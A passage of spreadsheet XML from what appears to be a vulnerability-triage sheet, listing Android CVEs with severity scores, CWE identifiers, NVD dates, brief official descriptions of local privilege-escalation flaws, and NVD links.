r="F420" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G420" s="5" t="inlineStr" /><c r="H420" s="5" t="n"><v>0.001</v></c><c r="I420" s="5" t="inlineStr" /><c r="J420" s="5" t="inlineStr" /><c r="K420" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L420" s="5" t="inlineStr" /><c r="M420" s="5" t="inlineStr" /><c r="N420" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O420" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P420" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q420" s="5" t="inlineStr" /><c r="R420" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S420" s="5" t="inlineStr"><is><t>In resolveActivity of ActivityStarter.java, there is a possible way to perform Intent Redirection attacks due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T420" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28612</t></is></c></row><row r="421"><c r="A421" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B421" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C421" s="5" t="inlineStr"><is><t>CVE-2026-28614</t></is></c><c r="D421" s="5" t="n"><v>7.8</v></c><c r="E421" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F421" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G421" s="5" t="inlineStr" /><c r="H421" s="5" t="n"><v>0.001</v></c><c r="I421" s="5" t="inlineStr" /><c r="J421" s="5" t="inlineStr" /><c r="K421" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L421" s="5" t="inlineStr" /><c r="M421" s="5" t="inlineStr" /><c r="N421" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O421" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P421" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q421" s="5" t="inlineStr" /><c r="R421" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S421" s="5" t="inlineStr"><is><t>In onCreate of SlicePermissionActivity.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T421" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28614</t></is></c></row><row r="422"><c r="A422" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B422" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C422" s="5" t="inlineStr"><is><t>CVE-2026-28616</t></is></c><c r="D422" s="5" t="n"><v>7.8</v></c><c r="E422" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F422" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G422" s="5" t="inlineStr" /><c r="H422" s="5" t="n"><v>0.001</v></c><c r="I422" s="5" t="inlineStr" /><c r="J422" s="5" t="inlineStr" /><c r="K422" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L422" s="5" t="inlineStr" /><c r="M422" s="5" t="inlineStr" /><c r="N422" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O422" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P422" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q422" s="5" t="inlineStr" /><c r="R422" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S422" s="5" t="inlineStr"><is><t>In Setup Wizard, there is a possible way to force connection to a malicious network due to confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T422" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28616</t></is></c></row><row r="423"><c r="A423" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B423" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C423" s="5" t="inlineStr"><is><t>CVE-2026-28620</t></is></c><c r="D423" s="5" t="n"><v>7.8</v></c><c r="E423" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F423" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G423" s="5" t="inlineStr" /><c r="H423" s="5" t="n"><v>0.001</v></c><c r="I423" s="5" t="inlineStr" /><c r="J423" s="5" t="inlineStr" /><c r="K423" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L423" s="5" t="inlineStr" /><c r="M423" s="5" t="inlineStr" /><c r="N423" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O423" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P423" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q423" s="5" t="inlineStr" /><c r="R423" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S423" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible unauthorized URI access due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T423" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28620</t></is></c></row><row r="424"><c r="A424" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B424" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C424" s="5" t="inlineStr"><is><t>CVE-2026-28624</t></is></c><c r="D424" s="5" t="n"><v>7.8</v></c><c r="E424" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F424" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G424" s="5" t="inlineStr" /><c r="H424" s="5" t="n"><v>0.001</v></c><c r="I424" s="5" t="inlineStr" /><c r="J424" s="5" t="inlineStr" /><c r="K424" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L424" s="5" t="inlineStr" /><c r="M424" s="5" t="inlineStr" /><c r="N424" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O424" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P424" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q424" s="5" t="inlineStr" /><c r="R424" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S424" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible read/write access to files without the proper permissions due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T424" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28624</t></is></c></row><row r="425"><c r="A425" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B425" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C425" s="5" t="inlineStr"><is><t>CVE-2026-28631</t></is></c><c r="D425" s="5" t="n"><v>7.8</v></c><c r="E425" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F425" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G425" s="5" t="inlineStr" /><c r="H425" s="5" t="n"><v>0.001</v></c><c r="I425" s="5" t="inlineStr" /><c r="J425" s="5" t="inlineStr" /><c r="K425" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L425" s="5" t="inlineStr" /><c r="M425" s="5" t="inlineStr" /><c r="N425" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O425" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P425" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q425" s="5" t="inlineStr" /><c r="R425" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S425" s="5" t="inlineStr"><is><t>In buildMiniResolver of IntentForwarderActivity.java, there is a possible consent bypass due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T425" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28631</t></is></c></row><row r="426"><c r="A426" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B426" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C426" s="5" t="inlineStr"><is><t>CVE-2026-28634</t></is></c><c r="D426" s="5" t="n"><v>7.8</v></c><c r="E426" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F426" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G426" s="5" t="inlineStr" /><c r="H426" s="5" t="n"><v>0.001</v></c><c r="I426" s="5" t="inlineStr" /><c r="J426" s="5" t="inlineStr" /><c r="K426" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L426" s="5" t="inlineStr" /><c r="M426" s="5" t="inlineStr" /><c r="N426" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O426" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P426" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q426" s="5" t="inlineStr" /><c r="R426" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S426" s="5" t="inlineStr"><is><t>In handleUssdRequest of PhoneInterfaceManager.java, there is a possible way to send a USSD request without permission due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T426" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28634</t></is></c></row><row r="427"><c r="A427" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B427" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C427" s="5" t="inlineStr"><is><t>CVE-2026-28636</t></is></c><c r="D427" s="5" t="n"><v>7.8</v></c><c r="E427" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F427" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G427" s="5" t="inlineStr" /><c r="H427" s="5" t="n"><v>0.001</v></c><c r="I427" s="5" t="inlineStr" /><c r="J427" s="5" t="inlineStr" /><c r="K427" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L427" s="5" t="inlineStr" /><c r="M427" s="5" t="inlineStr" /><c r="N427" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O427" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P427" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q427" s="5" t="inlineStr" /><c r="R427" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S427" s="5" t="inlineStr"><is><t>In setupLayout of PickActivity.java, there is a possible bypass of the "Install unknown apps" security restriction due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T427" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28636</t></is></c></row><row r="428"><c r="A428" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B428" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C428" s="5" t="inlineStr"><is><t>CVE-2026-28639</t></is></c><c r="D428" s="5" t="n"><v>7.8</v></c><c r="E428" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F428" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G428" s="5" t="inlineStr" /><c r="H428" s="5" t="n"><v>0.001</v></c><c r="I428" s="5" t="inlineStr" /><c r="J428" s="5" t="inlineStr" /><c r="K428" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L428" s="5" t="inlineStr" /><c r="M428" s="5" t="inlineStr" /><c r="N428" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O428" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P428" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q428" s="5" t="inlineStr" /><c r="R428" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S428" s="5" t="inlineStr"><is><t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T428" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28639</t></is></c></row><row r="429"><c r="A429" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B429" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C429" s="5" t="inlineStr"><is><t>CVE-2026-28642</t></is></c><c r="D429" s="5" t="n"><v>7.8</v></c><c r="E429" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F429" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G429" s="5" t="inlineStr" /><c r="H429" s="5" t="n"><v>0.001</v></c><c r="I429" s="5" t="inlineStr" /><c r="J429" s="5" t="inlineStr" /><c r="K429" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L429" s="5" t="inlineStr" /><c r="M429" s="5" t="inlineStr" /><c r="N429" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O429" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P429" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q429" s="5" t="inlineStr" /><c r="R429" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S429" s="5" t="inlineStr"><is><t>In executeRequest of ActivityStarter.java, there is a possible background activity launch due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T429" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28642</t></is></c></row><row r="430"><c r="A430" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B430" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C430" s="5" t="inlineStr"><is><t>CVE-2026-28644</t></is></c><c r="D430" s="5" t="n"><v>7.8</v></c><c r="E430" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F430" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G430" s="5" t="inlineStr" /><c r="H430" s="5" t="n"><v>0.001</v></c><c r="I430" s="5" t="inlineStr" /><c r="J430" s="5" t="inlineStr" /><c r="K430" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L430" s="5" t="inlineStr" /><c r="M430" s="5" t="inlineStr" /><c r="N430" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O430" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P430" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q430" s="5" t="inlineStr" /><c r="R430" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S430" s="5" t="inlineStr"><is><t>In startNextMatchingActivity of ActivityTaskManagerService.java, there is a possible permission bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T430" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28644</t></is></c></row><row r="431"><c r="A431" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B431" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C431" s="5" t="inlineStr"><is><t>CVE-2026-28650</t></is></c><c r="D431" s="5" t="n"><v>7.8</v></c><c r="E431" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F431" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G431" s="5" t="inlineStr" /><c r="H431" s="5" t="n"><v>0.001</v></c><c r="I431" s="5" t="inlineStr" /><c r="J431" s="5" t="inlineStr" /><c r="K431" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L431" s="5" t="inlineStr" /><c r="M431" s="5" t="inlineStr" /><c r="N431" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O431" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P431" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q431" s="5" t="inlineStr" /><c r="R431" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S431" s="5" t="inlineStr"><is><t>In setHiddenWhileSuspended of WindowState.java, there is a possible overlay bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T431" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28650</t></is></c></row><row r="432"><c r="A432" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B432" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C432" s="5" t="inlineStr"><is><t>CVE-2026-28653</t></is></c><c r="D432" s="5" t="n"><v>7.8</v></c><c r="E432" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F432" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G432" s="5" t="inlineStr" /><c r="H432" s="5" t="n"><v>0.001</v></c><c r="I432" s="5" t="inlineStr" /><c r="J432" s="5" t="inlineStr" /><c r="K432" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L432" s="5" t="inlineStr" /><c r="M432" s="5" t="inlineStr" /><c r="N432" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O432" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P432" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q432" s="5" t="inlineStr" /><c r="R432" s="5" t="inlineStr"><is><t>CWE-1190, CWE-787</t></is></c><c r="S432" s="5" t="inlineStr"><is><t>In multiple functions of rw_t3t.cc, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T432" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28653</t></is></c></row><row r="433"><c r="A433" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B433" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C433" s="5" t="inlineStr"><is><t>CVE-2026-28655</t></is></c><c r="D433" s="5" t="n"><v>7.8</v></c><c r="E433" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F433" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G433" s="5" t="inlineStr" /><c r="H433" s="5" t="n"><v>0.001</v></c><c r="I433" s="5" t="inlineStr" /><c r="J433" s="5" t="inlineStr" /><c r="K433" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L433" s="5" t="inlineStr" /><c r="M433" s="5" t="inlineStr" /><c r="N433" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O433" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P433" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q433" s="5" t="inlineStr" /><c r="R433" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S433" s="5" t="inlineStr"><is><t>In multiple functions of RemoteViews.java, there is a possible background activity launch bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T433" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28655</t></is></c></row><row r="434"><c r="A434" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B434" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C434" s="5" t="inlineStr"><is><t>CVE-2026-28657</t></is></c><c r="D434" s="5" t="n"><v>7.8</v></c><c r="E434" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F434" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G434" s="5" t="inlineStr" /><c r="H434" s="5" t="n"><v>0.001</v></c><c r="I434" s="5" t="inlineStr" /><c r="J434" s="5" t="inlineStr" /><c r="K434" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L434" s="5" t="inlineStr" /><c r="M434" s="5" t="inlineStr" /><c r="N434" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O434" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P434" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q434" s="5" t="inlineStr" /><c r="R434" s="5" t="inlineStr"><is><t>CWE-441</t></is></c><c r="S434" s="5" t="inlineStr"><is><t>In onActivityResult of AppWidgetConfigActivityProxy.java, there is a possible unauthorized URI permission grant due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T434" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28657</t></is></c></row><row r="435"><c r="A435" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B435" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C435" s="5" t="inlineStr"><is><t>CVE-2026-28658</t></is></c><c r="D435" s="5" t="n"><v>7.8</v></c><c r="E435" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F435" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G435" s="5" t="inlineStr" /><c r="H435" s="5" t="n"><v>0.001</v></c><c r="I435" s="5" t="inlineStr" /><c r="J435" s="5" t="inlineStr" /><c r="K435" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L435" s="5" t="inlineStr" /><c r="M435" s="5" t="inlineStr" /><c r="N435" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O435" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P435" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q435" s="5" t="inlineStr" /><c r="R435" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S435" s="5" t="inlineStr"><is><t>In findMetaAuthUid of AccountsDb.java, there is a possible frp bypass due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T435" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28658</t></is></c></row><row r="436"><c r="A436" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B436" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C436" s="5" t="inlineStr"><is><t>CVE-2026-28659</t></is></c><c r="D436" s="5" t="n"><v>7.8</v></c><c r="E436" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G436" s="5" t="inlineStr" /><c r="H436" s="5" t="n"><v>0.001</v></c><c r="I436" s="5" t="inlineStr" /><c r="J436" s="5" t="inlineStr" /><c r="K436" s="5" t="inlineStr"><is><t>google:android_xr</t></is></c><c r="L436" s="5" t="inlineStr" /><c r="M436" s="5" t="inlineStr" /><c r="N436" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O436" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P436" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q436" s="5" t="inlineStr" /><c r="R436" s="5" t="inlineStr"><is><t>CWE-269</t></is></c><c r="S436" s="5" t="inlineStr"><is><t>In MicroXR Blobstore, there is a possible way to access other app's files due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T436" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28659</t></is></c></row><row r="437"><c r="A437" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B437" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C437" s="5" t="inlineStr"><is><t>CVE-2026-28663</t></is></c><c r="D437" s="5" t="n"><v>7.8</v></c><c r="E437" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F437" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G437" s="5" t="inlineStr" /><c r="H437" s="5" t="n"><v>0.001</v></c><c r="I437" s="5" t="inlineStr" /><c r="J437" s="5" t="inlineStr" /><c r="K437" s="5" t="inlineStr" /><c r="L437" s="5" t="inlineStr" /><c r="M437" s="5" t="inlineStr" /><c r="N437" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O437" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P437" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q437" s="5" t="inlineStr" /><c r="R437" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S437" s="5" t="inlineStr"><is><t>In buildIntentSenderForUser of LauncherAppsService.java, there is a possible way to launch an activity from the background due to BAL Bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T437" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t></is></c></row><row r="438"><c r="A438" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B438" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C438" s="5" t="inlineStr"><is><t>CVE-2026-28664</t></is></c><c r="D438" s="5" t="n"><v>7.8</v></c><c r="E438" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F438" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G438" s="5" t="inlineStr" /><c r="H438" s="5" t="n"><v>0.001</v></c><c r="I438" s="5" t="inlineStr" /><c r="J438" s="5" t="inlineStr" /><c r="K438" s="5" t="inlineStr" /><c r="L438" s="5" t="inlineStr" /><c r="M438" s="5" t="inlineStr" /><c r="N438" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P438" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q438" s="5" t="inlineStr" /><c r="R438" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S438" s="5" t="inlineStr"><is><t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T438" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t></is></c></row><row r="439"><c r="A439" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B439" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C439" s="5" t="inlineStr"><is><t>CVE-2026-28668</t></is></c><c r="D439" s="5" t="n"><v>7.8</v></c><c r="E439" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F439" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G439" s="5" t="inlineStr" /><c r="H439" s="5" t="n"><v>0.001</v></c><c r="I439" s="5" t="inlineStr" /><c r="J439" s="5" t="inlineStr" /><c r="K439" s="5" t="inlineStr" /><c r="L439" s="5" t="inlineStr" /><c r="M439" s="5" t="inlineStr" /><c r="N439" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O439" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P439" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q439" s="5" t="inlineStr" /><c r="R439" s="5" t="inlineStr"><is><t>CWE-693</t></is></c><c r="S439" s="5" t="inlineStr"><is><t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T439" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t></is></c></row><row r="440"><c r="A440" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B440" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C440" s="5" t="inlineStr"><is><t>CVE-2026-45515</t></is></c><c r="D440" s="5" t="n"><v>7.8</v></c><c r="E440" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F440" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G440" s="5" t="inlineStr" /><c r="H440" s="5" t="n"><v>0.001</v></c><c r="I440" s="5" t="inlineStr" /><c r="J440" s="5" t="inlineStr" /><c r="K440" s="5" t="inlineStr" /><c r="L440" s="5" t="inlineStr" /><c r="M440" s="5" t="inlineStr" /><c r="N440" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O440" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P440" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q440" s="5" t="inlineStr" /><c r="R440" s="5" t="inlineStr"><is><t>CWE-122, CWE-787</t></is></c><c r="S440" s="5" t="inlineStr"><is><t>In a2dp_vendor_opus_decoder_decode_packet of a2dp_vendor_opus_decoder.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T440" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t></is></c></row><row r="441"><c r="A441" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B441" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C441" s="5" t="inlineStr"><is><t>CVE-2026-45520</t></is></c><c r="D441" s="5" t="n"><v>7.8</v></c><c r="E441" 